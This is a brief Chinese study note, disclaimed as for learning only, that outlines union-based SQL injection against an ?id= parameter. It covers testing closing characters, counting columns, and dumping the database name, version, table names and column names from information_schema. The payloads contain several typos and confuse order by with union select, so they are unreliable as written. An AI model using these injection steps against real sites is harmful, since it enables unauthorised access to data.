本文章仅供学习分享使用,不做任何违法行为!!!
一.漏洞的挖掘
- sql注入漏洞:
- 判断一个网站是否存在一个sql注入的漏洞?Id=1
- 如果判断出来存在sql注入漏洞,则进判断sql注入的闭合字符 ?id=1’ and 1=1 ?id=1’ and 1=2
- 判断列数 ,采用二分法进行判断 order by 10
- 判断显示位,假设显示位为3,则order by 1,2,3
- 爆数据库,在爆数据库的前提下,爆一下网站的版本
Order by 1,database(),version()
- 爆表名 group_concat(table_name)fron information_shema.talbes where table_shema=’security’-- +
- 爆列名:group_concat(column_name) from information_schema.columns where table.schema=’security’ and table.name=’users’-- +
